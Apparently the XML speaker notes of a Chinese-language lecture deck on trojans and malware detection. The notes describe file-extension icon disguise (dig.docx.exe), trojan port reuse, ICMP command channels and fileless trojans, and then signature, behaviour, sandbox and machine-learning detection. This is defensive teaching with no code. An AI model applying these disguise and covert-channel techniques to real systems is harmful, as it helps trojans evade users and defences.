      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4520099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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1294723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8BFBA5-37C9-4B2F-A3D7-0B710D96EB5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244162" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12441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9989061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6296D1-E5AE-4B9D-879B-9C26B33FA9CE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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0173156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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18173083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dig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>伪装：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dig.docx.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的文件类型图标伪装。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件浏览器显示文件时，如果只显示图标，如上图（右边是可执行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用的默认文件类型图标），则很容易就认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dig.docx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档（如果用户多想一想就可以识破，因为文件类型字符串不会出现在只显示文件图标时的文件名上，即类型后缘是不会显示的）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下图（下面是可执行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dig.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用的默认文件类型图标）显示的是文件完整信息，可以看到文件类型是应用程序，即可执行程序</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这种欺骗的目的主要是诱骗用户击点文件，从而启动木马。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>尽管可以将文件名改为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>dig.exe.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，虽然显示的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件图标，但无法启动，而是用默认的文件类型打开软件（如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，通常是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>notepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），无法启动木马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1282791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https://jingyan.baidu.com/article/915fc4149e399a51394b2021.html</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16432441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https://blog.csdn.net/weixin_45459911/article/details/105009734</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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31151706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https://wenku.baidu.com/view/cddbccbc0b75f46527d3240c844769eae009a3ce.html</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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2290402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在应用程序进行网络通信时，需要将本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址和特定的端口绑定到一个套接字上，然后用该套接字进行通信。当系统接收到数据包时，会根据包中的端口号找到特定的应用程序进行转发。当木马程序使用端口复用技术接收到数据包后，系统先将该数据包下发给木马程序判断模块，由其根据数据包的特征结构判断该数据包应该先转发给木马端口复用模块还是直接转发给应用程序</a:t>
            </a:r>
          </a:p>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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32559086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更好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马严格使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协议进行数据和控制命令的传递</a:t>
            </a:r>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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1578890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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9656894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https://wenku.baidu.com/view/ff1c7477951ea76e58fafab069dc5022abea4625.html</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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20471718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6296D1-E5AE-4B9D-879B-9C26B33FA9CE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>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9805359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https://www.jianshu.com/p/37c14d9249fa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>几乎所所有病毒、木马分析报告的后面都会给出样本的散列值</a:t>
            </a:r>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126</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381424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https://malwr-analysis.com/2020/07/24/crimson-rat-malware-analysis/</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127</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42118195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https://mp.weixin.qq.com/s/WmzryWNNJVV7mXABQ1Yu8g</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>分析报告</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2020.7.16</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128</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1301330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a:t>早期杀毒软件主要采用的是特征码检测技术，即使发展到今天，也仍然是被杀毒软件普遍采用的一种最基本的检测技术</a:t>
            </a:r>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132</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34301911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a:t>因此，现在很多杀毒软件在检测到异常时，例如检测到应用修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注册表、一个进程在进行线程插入等，会给用户弹出告警提示，由用户确定是否允许操作继续，而采用特征码检测技术时，杀毒软件一般在检测到匹配的恶意代码时会默认将其查杀或隔离</a:t>
            </a:r>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134</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28195233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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>沙箱是一种能够拦截系统调用并限制程序执行违反安全策略的轻量级虚拟机，其核心在于建立一个行为受限的执行环境，将样本程序放入到该环境中运行，其在沙箱内的文件操作、注册表操作等的路径会重定向到沙箱指定位置，程序的一些危险行为，例如底层磁盘操作、安装驱动等会被沙箱禁止，这就确保系统环境不会受到影响，系统状态在操作之后回滚。例如，著名开源沙箱</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Cuckoo</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可以分析</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>可执行文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Office </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>文件、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>VB </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>脚本等其他类型文件，其主要功能包括：跟踪恶意代码进程的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>调用，监测运行过程中被恶意代码创建、删除和下载的文件，跟踪客户机产生的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>格式的网络流量，获取恶意代码选定进程的内存镜像等。杀毒软件公司一般都是通过沙箱技术对一些可疑的未知恶意样本进行分析，特别是一些</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击组织使用的、采用了很多伪装和反分析技术的恶意代码。</a:t>
            </a:r>
          </a:p>
          <a:p>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135</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40627408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https://www.secrss.com/articles/29698</a:t>
            </a:r>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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25756887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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>采集大量的恶意代码样本以及正常的程序样本作为训练样本；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对训练样本进行预处理，提取特征；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>进一步选取用于训练的数据特征；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>选择合适的机器学习算法训练分类模型；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>通过训练后的分类模型对未知样本进行检测。</a:t>
            </a:r>
          </a:p>
          <a:p>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137</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="818378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现在木马主要都用伪装的方式来保护自己，这种无文件的方式也比较常用</a:t>
            </a:r>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42799329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dirty="0"/>
              <a:t>普通机器学习方法和深度学习方法相比，普通机器学习方法的参数比较少，相对计算量较小，但检测的精度和准确率要比深度学习算法低，特别是在一些少有的高级恶意代码样本的检测上</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>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138</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15183581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zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>虽然机器学习方法与传统恶意代码方法相比有很多优势，特别是在大规模样本检测能力上，但也存在一些不足，如检测的准确率还有待提高、对计算能力的要求比较高、有监督机器学习方法中的样本标注问题等，同时近几年越来越多的对机器学习算法进行攻击的研究，如对抗样本，表明少量精心设计的样本即可导致机器学习检测算法出错。随着该领域的研究越来越多，基于机器学习的恶意代码检测方法所面临的这些问题未来会得到有效解决。实际应用中，基于机器学习的恶意代码检测方法和传统检测方法可以相互补充，以取得更好的检测结果。</a:t>
            </a:r>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141</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94754271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https://www.secrss.com/articles/29283</a:t>
            </a:r>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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346189354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2020.7.19</a:t>
            </a:r>
            <a:r>
